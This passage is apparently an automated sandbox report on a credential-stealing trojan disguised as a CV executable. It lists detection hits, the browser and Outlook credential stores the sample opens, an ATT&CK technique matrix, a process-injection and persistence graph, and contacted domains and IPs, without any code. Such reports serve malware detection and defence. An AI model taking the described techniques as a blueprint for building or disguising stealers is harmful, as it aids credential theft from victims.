                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3288992952.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3289778566.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7740, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7740, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3288992952.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3289778566.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7740, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                311
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                11
                Security Software Discovery
                Remote Services1
                Email Collection
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                Scheduled Task/Job
                11
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture13
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Obfuscated Files or Information
                Cached Domain Credentials1
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync13
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557909 Sample: Kayla Dennis CV.exe Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 checkip.dyndns.org 2->52 54 checkip.dyndns.com 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Sigma detected: Scheduled temp file as task from temp location 2->60 64 10 other signatures 2->64 8 Kayla Dennis CV.exe 7 2->8         started        12 lyKbfEsVYfQfU.exe 5 2->12         started        signatures3 62 Tries to detect the country of the analysis system (by using the IP) 50->62 process4 file5 38 C:\Users\user\AppData\...\lyKbfEsVYfQfU.exe, PE32 8->38 dropped 40 C:\...\lyKbfEsVYfQfU.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\Temp\tmp796.tmp, XML 8->42 dropped 44 C:\Users\user\...\Kayla Dennis CV.exe.log, ASCII 8->44 dropped 66 Writes to foreign memory regions 8->66 68 Allocates memory in foreign processes 8->68 70 Adds a directory exclusion to Windows Defender 8->70 14 powershell.exe 23 8->14         started        17 RegSvcs.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        26 3 other processes 8->26 72 Multi AV Scanner detection for dropped file 12->72 74 Machine Learning detection for dropped file 12->74 76 Injects a PE file into a foreign processes 12->76 22 RegSvcs.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 checkip.dyndns.com 132.226.247.73, 49711, 49714, 49716 UTMEMUS United States 17->46 48 reallyfreegeoip.org 188.114.96.3, 443, 49712, 49713 CLOUDFLARENETUS European Union 17->48 32 conhost.exe 20->32         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Kayla Dennis CV.exe30%ReversingLabsByteCode-MSIL.Trojan.SnakeStealer
                Kayla Dennis CV.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe30%ReversingLabsByteCode-MSIL.Trojan.SnakeStealer
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://crl.microHy1s.0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.96.3
                truefalse
                  high
                  checkip.dyndns.com
                  132.226.247.73
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        high
                        https://reallyfreegeoip.org/xml/155.94.241.187false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.microHy1s.RegSvcs.exe, 0000000B.00000002.3296169497.0000000006600000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.org/qKayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            high
                            https://www.google.com/#q=Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.drfalse
                              high
                              http://reallyfreegeoip.orgRegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://reallyfreegeoip.orgRegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://checkip.dyndns.orgRegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003090000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003165000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://checkip.dyndns.comRegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKayla Dennis CV.exe, 00000000.00000002.2131860326.0000000003421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, lyKbfEsVYfQfU.exe, 0000000C.00000002.2224356364.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.drfalse
                                          high
                                          https://reallyfreegeoip.org/xml/155.94.241.187$RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org/xml/Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              188.114.96.3
                                              reallyfreegeoip.orgEuropean Union
                                              13335CLOUDFLARENETUSfalse
                                              132.226.247.73
                                              checkip.dyndns.comUnited States
                                              16989UTMEMUSfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1557909
                                              Start date and time:2024-11-18 18:20:20 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 7s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Kayla Dennis CV.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@23/15@2/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 70
                                              • Number of non-executed functions: 8
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: Kayla Dennis CV.exe
                                              TimeTypeDescription
                                              12:21:10API Interceptor2x Sleep call for process: Kayla Dennis CV.exe modified
                                              12:21:17API Interceptor32x Sleep call for process: powershell.exe modified
                                              12:21:21API Interceptor2x Sleep call for process: lyKbfEsVYfQfU.exe modified
                                              12:21:21API Interceptor2871578x Sleep call for process: RegSvcs.exe modified
                                              18:21:18Task SchedulerRun new task: lyKbfEsVYfQfU path: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              188.114.96.3QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • filetransfer.io/data-package/Bh1Kj4RD/download
                                              http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                              • kklk16.bsyo45ksda.top/favicon.ico
                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                              • filetransfer.io/data-package/XrlEIxYp/download
                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                              • filetransfer.io/data-package/XrlEIxYp/download
                                              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • filetransfer.io/data-package/7pdXjNKP/download
                                              gusetup.exeGet hashmaliciousUnknownBrowse
                                              • go.glarysoft.com/g/t/releasenotes/cn/10000/s/Glary%20Utilities/v/6.16.0.20
                                              BlgAsBdkiD.exeGet hashmaliciousFormBookBrowse
                                              • www.vrxlzluy.shop/d8g5/
                                              Facebook_Advertiser_Position_Description.lnkGet hashmaliciousDucktailBrowse
                                              • gmtagency.online/api/check
                                              https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/graylinelaketahoe.com&c=E,1,BWhR2At2OZAdw2Kzdn7d-U-fLZRdgzpdTFbcA87JOQxek-SzsLBqKBG-KMVpA5JovWFRbO4mN3q2zPe1YDaTOG57b4G9v05-IgsJXqrG4om_58_65Os9ldlZ&typo=1Get hashmaliciousUnknownBrowse
                                              • graylinelaketahoe.com/
                                              View Pdf Doc_a42d45ecadd4b9604949c99fe71e46fe.htmGet hashmaliciousUnknownBrowse
                                              • jssqm.nhgrt.top/WjBkrg/34JSSQm34?&&2yq=bC5zY2FybGF0ZWxsaUBhbG1hdml2YS5pdA%3D%3D
                                              132.226.247.73New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                              • checkip.dyndns.org/
                                              Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Ziraat#U00a0Bankas#U0131 swift mesaji_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              RFQ for WIKA_pdf.exeGet hashmaliciousGuLoaderBrowse
